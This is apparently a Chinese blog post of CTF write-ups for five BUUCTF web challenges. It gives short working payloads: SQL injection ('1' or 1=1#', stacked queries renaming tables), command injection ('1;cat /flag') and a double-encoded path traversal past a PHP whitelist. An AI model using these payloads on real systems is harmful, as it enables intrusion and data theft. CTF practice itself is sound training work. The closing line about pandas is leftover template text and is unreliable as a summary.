BUUCTF

BUUCTF


一、[极客大挑战 2019]EasySQL

在这里插入图片描述
sql注入先试一下万能密码

1' or 1=1#

直接给flag了
在这里插入图片描述

二、[极客大挑战 2019]Havefun

在这里插入图片描述
F12查看源代码
在这里插入图片描述

使用get传参并且使cat=dog构造payload:

/?cat=dog

拿到flag

三、[HCTF 2018]WarmUp

在这里插入图片描述
查看源码有个文件查看一下
代码审计

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)//&$page这个应该是个地址符传入参数
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//定义白名单
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(//mb_substr() 函数返回字符串的一部分这里应该是指返回两个问号之间的部分
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);//进行url解码
            $_page = mb_substr(//再次返回两个?之间的内容
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])//判断file是否为空
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

看一下hint.php
在这里插入图片描述
使用…/进行目录翻阅
首先在网页端会进行一次url解码在这个函数中也进行了一次url解码所以说我们需要对?进行两次url编码也就是%253F
构造payload

/source.php?file=source.php%253F../../../../../ffffllllaaaagggg

拿到flag
在这里插入图片描述

四、[ACTF2020 新生赛]Exec

在这里插入图片描述
使用ls查看根目录内容

1;ls /      (这里的/指的是根目录下的文件)

在这里插入图片描述
因为我们不知到flag是什么类型的文件所以不加后缀直接cat
payload:

1;cat /flag

在这里插入图片描述

五、[强网杯 2019]随便注

sql注入
在这里插入图片描述
这些都被过滤掉了使用show

爆数据库
show databases;
在这里插入图片描述
爆表
show tables;
在这里插入图片描述
爆列
show columns from 1919810931114514#
在这里插入图片描述
有个flag但这里的flag应该看不了有可能被过虑掉了
把flag换个名字在查看
构造payload

1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

在这里插入图片描述

提示:这里对文章进行总结:
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值